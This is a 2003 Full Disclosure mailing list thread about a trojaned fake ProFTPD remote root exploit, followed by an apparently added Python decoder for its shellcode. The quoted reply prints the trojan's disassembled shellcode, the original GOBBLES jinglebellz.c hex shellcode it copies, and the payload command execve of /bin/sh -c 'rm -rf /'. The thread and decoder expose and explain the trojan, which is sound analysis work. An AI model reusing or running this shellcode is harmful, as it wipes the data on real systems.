Full Disclosure mailing list archives
Trojan author revealed (was: Re: ProFTPD-1.2.9rc2 remote root exploit)
From: mitch_hurrison () ziplip com
Date: Fri, 24 Oct 2003 16:15:18 -0700 (PDT)
Hi list,

Hrmm. Ok, I'm no Sherlock Holmes, but even I could see through this 'analysis'. This is obviously an elaborate attempt to soil the reputations of the fine people, dare I say heroes of information security, at GOBBLES security. Let's examine the case at hand:

1) Someone makes the effort of cutting up an existing public GOBBLES shellcode. An act that requires just as much effort as writing original opcode.

2) This cut-up version is used in a 'trojan' even my grandmother would be able to spot. (Obscure in-exploit overflows are way more effective folks, ask HD "I pioneered screensavers" Moore.)

3) Some random hero pops up on the list pointing out that 'hey, this is GOBBLES shellcode *WINK*'. Now who, on God's green earth, would recognise shellcode from an obscure exploit that was published months ago, if they didn't have it fresh in memory?

So I think it's rather obvious that either zeroboy or one of his friends is responsible for this trojan, and he has some sort of rancune towards GOBBLES. Either that or he has a serious hard-on for memorising hex opcode buffers.

With regards,
Mitch
-----Original Message-----
From: zero [mailto:zeroboy () arrakis es]
Sent: Friday, October 24, 2003, 1:19 PM
To: full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] ProFTPD-1.2.9rc2 remote root exploit

Hmmm, let's see:

Dump of assembler code for function shellcode:
0x08049480 <shellcode+0>: xor %eax,%eax
0x08049482 <shellcode+2>: push %eax
0x08049483 <shellcode+3>: push $0x582f2066
0x08049488 <shellcode+8>: push $0x722d206d
0x0804948d <shellcode+13>: push $0x7258632d
0x08049492 <shellcode+18>: push $0x41414141
0x08049497 <shellcode+23>: push $0x41414141
0x0804949c <shellcode+28>: push $0x41414141
0x080494a1 <shellcode+33>: push $0x41414141
0x080494a6 <shellcode+38>: push $0x4368732f
0x080494ab <shellcode+43>: push $0x6e69622f // /bin/shCAAAAAAAAAAAAAAAA/cXrm -rf /X
0x080494b0 <shellcode+48>: xor %eax,%eax
0x080494b2 <shellcode+50>: mov %al,0x7(%esp,1)
0x080494b6 <shellcode+54>: mov %al,0x1a(%esp,1)
0x080494ba <shellcode+58>: mov %al,0x23(%esp,1)
0x080494be <shellcode+62>: mov %esp,0x8(%esp,1)
0x080494c2 <shellcode+66>: xor %ebx,%ebx
0x080494c4 <shellcode+68>: lea 0x18(%esp,1),%ebx
0x080494c8 <shellcode+72>: mov %ebx,0xc(%esp,1)
0x080494cc <shellcode+76>: xor %ebx,%ebx
0x080494ce <shellcode+78>: lea 0x1b(%esp,1),%ebx
0x080494d2 <shellcode+82>: mov %ebx,0x10(%esp,1)
0x080494d6 <shellcode+86>: mov %eax,0x14(%esp,1)
0x080494da <shellcode+90>: xor %ebx,%ebx
0x080494dc <shellcode+92>: mov %esp,%ebx
0x080494de <shellcode+94>: lea 0x8(%esp,1),%ecx
0x080494e2 <shellcode+98>: xor %edx,%edx
0x080494e4 <shellcode+100>: lea 0x14(%esp,1),%edx
0x080494e8 <shellcode+104>: mov $0xb,%al
0x080494ea <shellcode+106>: int $0x80
0x080494ec <shellcode+108>: xor %ebx,%ebx
0x080494ee <shellcode+110>: xor %eax,%eax
0x080494f0 <shellcode+112>: inc %eax
0x080494f1 <shellcode+113>: int $0x80
0x080494f3 <shellcode+115>: add %al,(%eax)
End of assembler dump.

Let's give credits to the original c0d3rs of this shellcode.
Nobody remembers jinglebellz.c?

<snip>
/* jinglebellz.c - local/remote exploit for mpg123
   (c) 2003 GOBBLES Security seXForces
   [...] */

unsigned char linux_shellcode[] = /* contributed by antiNSA */
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x3b\x50\x31\xc0\x68\x6f"
"\x72\x74\x0a\x68\x6f\x20\x61\x62\x68\x2d\x63\x20\x74\x68\x43"
"\x54\x52\x4c\x68\x73\x2e\x2e\x20\x68\x63\x6f\x6e\x64\x68\x35"
"\x20\x73\x65\x68\x20\x69\x6e\x20\x68\x72\x66\x20\x7e\x68\x72"
"\x6d\x20\x2d\xb3\x02\x89\xe1\xb2\x29\xb0\x04\xcd\x80\x31\xc0"
"\x31\xff\xb0\x05\x89\xc7\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66"
"\xba\x70\x50\x52\xb3\x02\x89\xe1\x31\xd2\xb2\x02\xb0\x04\xcd"
"\x80\x31\xc0\x31\xdb\x31\xc9\x50\x40\x50\x89\xe3\xb0\xa2\xcd"
"\x80\x4f\x31\xc0\x39\xc7\x75\xd1\x31\xc0\x31\xdb\x31\xc9\x31"
"\xd2\x68\x66\x20\x7e\x58\x68\x6d\x20\x2d\x72\x68\x2d\x63\x58"
"\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41\x41\x41"
"\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f\x62\x69"
"\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44\x24\x23"
"\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24\x0c\x31"
"\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14\x31\xdb"
"\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0\x0b\xcd"
"\x80\x31\xdb\x31\xc0\x40\xcd\x80";
</snip>

Well well, just a nice copy paste of some of it? :pPpPpPppP

And the exact cmd is:

execve("/bin/sh", {"/bin/sh", "-c", "rm -rf /", NULL}, {"rm -rf /", NULL})

NOTE: In this one ~ is changed for a nicer one, /

Have a nice turkey.

Cheerz
www.citfi.org
www.podergeek.com

**********************************
"The further backward you look, the further forward you can see" Winston Churchill
"Access is GOD..."

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
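To show how the execve() call in zero's reply follows from the gdb dump, here is an added Python decoder (not code from the thread or from either poster) that replays the pushes and stores on a reconstructed stack and resolves the argv pointer table into strings. The excerpt it parses is taken from the dump quoted above, with the xor and push %eax lines left out since they do not affect the result.

```python
import re
import struct

# Excerpt of the gdb dump quoted in the thread: the pushes that build the strings
# and the stores that NUL-terminate them and fill the argv table (xor lines omitted).
GDB_DUMP = """\
0x08049483 <shellcode+3>: push $0x582f2066
0x08049488 <shellcode+8>: push $0x722d206d
0x0804948d <shellcode+13>: push $0x7258632d
0x08049492 <shellcode+18>: push $0x41414141
0x08049497 <shellcode+23>: push $0x41414141
0x0804949c <shellcode+28>: push $0x41414141
0x080494a1 <shellcode+33>: push $0x41414141
0x080494a6 <shellcode+38>: push $0x4368732f
0x080494ab <shellcode+43>: push $0x6e69622f
0x080494b2 <shellcode+50>: mov %al,0x7(%esp,1)
0x080494b6 <shellcode+54>: mov %al,0x1a(%esp,1)
0x080494ba <shellcode+58>: mov %al,0x23(%esp,1)
0x080494be <shellcode+62>: mov %esp,0x8(%esp,1)
0x080494c4 <shellcode+68>: lea 0x18(%esp,1),%ebx
0x080494c8 <shellcode+72>: mov %ebx,0xc(%esp,1)
0x080494ce <shellcode+78>: lea 0x1b(%esp,1),%ebx
0x080494d2 <shellcode+82>: mov %ebx,0x10(%esp,1)
0x080494d6 <shellcode+86>: mov %eax,0x14(%esp,1)
"""

def rebuild_stack(dump):
    """Bytes the pushes leave on the stack, lowest address first (last push lands lowest)."""
    imms = re.findall(r"push\s+\$0x([0-9a-f]+)", dump)
    return bytearray(b"".join(struct.pack("<I", int(v, 16)) for v in reversed(imms)))

def decode_execve(dump):
    """Replay the stores (eax is zero throughout, so %al/%eax writes are NULs) and resolve argv."""
    buf, slots, ebx = rebuild_stack(dump), {}, None
    for line in dump.splitlines():
        if m := re.search(r"mov %al,0x([0-9a-f]+)\(%esp", line):
            buf[int(m.group(1), 16)] = 0              # NUL-terminate a string
        elif m := re.search(r"lea 0x([0-9a-f]+)\(%esp,1\),%ebx", line):
            ebx = int(m.group(1), 16)                 # ebx = address of stack[off]
        elif m := re.search(r"mov %(esp|ebx|eax),0x([0-9a-f]+)\(%esp", line):
            slots[int(m.group(2), 16)] = {"esp": 0, "ebx": ebx, "eax": None}[m.group(1)]
    argv = []
    for slot in sorted(slots):                        # argv[] slots sit at 0x8, 0xc, 0x10, 0x14
        if slots[slot] is None:                       # the NULL terminator written from %eax
            break
        start = slots[slot]
        argv.append(buf[start:buf.index(0, start)].decode("ascii"))
    return argv
```

The 16 'A' bytes are only padding: the argv pointers are written over them at offsets 0x8 to 0x14, which is why the raw string looks like "/bin/shCAAAAAAAAAAAAAAAA-cXrm -rf /X" before the NUL writes split it.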